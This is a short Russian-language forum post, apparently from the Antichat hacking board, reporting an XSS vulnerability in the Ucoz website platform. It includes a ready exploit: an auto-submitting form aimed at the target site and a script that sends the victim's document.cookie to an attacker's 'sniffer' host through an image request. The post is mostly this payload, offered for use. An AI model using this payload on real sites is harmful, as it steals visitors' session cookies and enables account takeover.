Программа: Ucoz Уязвимость позволяет удаленному пользователю выполнить XSS нападение на целевую систему. Уязвимость существует из-за недостаточной обработки входных данных при обработке HTTP запросов. Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Эксплоит: Code: <form action="http://host/" method="post" name="main" ></form> <script>img = new Image(); img.src = "http://sniffer/images/s.gif?"+document.cookie;</script> <script> document.main.submit(); </script> ____________________________________ (C) %R00tKit% специально для Античата
